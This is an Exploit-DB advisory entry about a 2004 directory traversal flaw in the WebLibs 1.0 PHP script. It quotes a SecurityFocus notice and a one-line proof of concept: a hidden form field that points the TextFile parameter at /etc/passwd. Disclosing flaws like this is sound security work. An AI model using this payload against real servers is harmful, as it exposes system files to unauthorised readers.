darryl burgdorf weblibs 1.0 - Directory Traversal

EDB-ID:

24806




Platform:

PHP

Date:

2004-12-07


source: https://www.securityfocus.com/bid/11848/info

It is reported that WebLibs is prone to a remote directory traversal vulnerability. This issue is due to a failure of the application to properly filter user-supplied input. 

WebLibs 1.0 is affected by this vulnerability.

The following proof of concept is available:
<INPUT type=hidden value="/../../../../../etc/passwd" name="TextFile">